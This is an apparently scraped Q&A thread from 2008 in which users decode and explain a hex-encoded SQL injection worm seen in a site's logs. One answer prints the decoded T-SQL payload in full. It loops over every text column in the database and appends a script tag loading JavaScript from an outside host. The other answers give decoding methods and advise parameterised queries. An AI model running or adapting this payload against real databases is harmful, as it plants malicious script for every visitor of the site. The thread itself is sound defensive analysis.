ansaurus

Question

Attempted SQL injection attack - what are they trying to do?

Answer 1

+22 A:

Below is the decoded SQL that they were trying to push:

DECLARE @T varchar(255),
        @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name
FROM sysobjects a,syscolumns b 
WHERE a.id=b.id 
AND a.xtype='u' 
AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) 

OPEN Table_Cursor FETCH NEXT 
FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
  BEGIN exec('update ['+@T+'] SET ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"&gt;&lt;/script&gt;&lt;!--''+['+@C+'] WHERE '+@C+' NOT like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"&gt;&lt;/script&gt;&lt;!--''')
  FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END CLOSE Table_Cursor 

DEALLOCATE Table_Cursor

Ishmaeel 2008-10-14 09:45:46

How did you un-encode this?

Guy 2008-10-14 09:48:10

Googling "hex to string" gave me this: http://www.string-functions.com/hex-string.aspx. After that, it was a simple matter of SQL pretty-printing.

Ishmaeel 2008-10-14 09:49:26

*Smacks head* Thank you ever so much for such a fast response.

Guy 2008-10-14 09:52:16

Seen this attempt to, they tried it at a LAMP stack.

Jacco 2008-10-14 11:39:37

even easier way to decode - paste the above into query analyzer or equivalent query engine. Change exec(@s) to print @s. voila

Sam Meldrum 2008-10-14 11:52:44

there's a massive Chinese botnet that's striking all across the web, trying this on every form in every page it can find. We get probed with this several times a day -- a useful, though annoying, way to show that we're immune to such attacks.

Danimal 2008-10-14 12:43:29

Answer 2

+11 A:

The code, when decyphered from hex into chars, seems to go through all your database tables, select all columns that are of text/char type, and at the end of each value of this type add a malicious script execution from http://www2.s800qn.cn/csrss/w.js. Now if in your website, you have at least one place where you don't escape text data retrieved from your database, your site's users will have this malicious script executed on their machines.

DzinX 2008-10-14 09:48:49

Answer 3

+3 A:

I think we've had this attack before. It's trying to insert a <script> tag in every field in every table in the database.

jammus 2008-10-14 09:49:17

Answer 4

+1 A:

The simplest Python algorithm to decypher the hex code is this:

text = "4445434C415245204054207661726368617228323535292C404..."

def getText():
    for i in range(0, len(text), 2):
        byte = text[i:i+2]
        char = int(byte, 16)
        toPrint = chr(char)
        yield toPrint

print ''.join(getText())

DzinX 2008-10-14 09:50:10

Answer 5

+6 A:

Run this, for example in mysql:

select CAST(0x44...72 AS CHAR(4000)) as a;

and you'll know. Ishmaeel pasted the code.

This is a SQLserver worm, not a targeted atatck.

Tometzky 2008-10-14 09:51:42

Answer 6

+3 A:

It's an adware-dropper script, built to clog up your database with <script> tags that show up on your pages. It's encoded because most servers would explode if you tried to push that junk through the URL.

Most things like this are random-attempt-attacks in that they'll hit anything with a querystring but it might be a targeted attack. Test your site to make sure it's not letting any SQL from querystrings execute. Just using parametrised queries should cover you.

Oli 2008-10-14 09:55:15

Yes, I also encode my QUERYSTRING's and FORM fields, remove angle brackets etc etc and the other usual data hygene stuff!

Guy 2008-10-14 10:00:43

ansaurus

tags:

views:

answers:

Attempted SQL injection attack - what are they trying to do?

related questions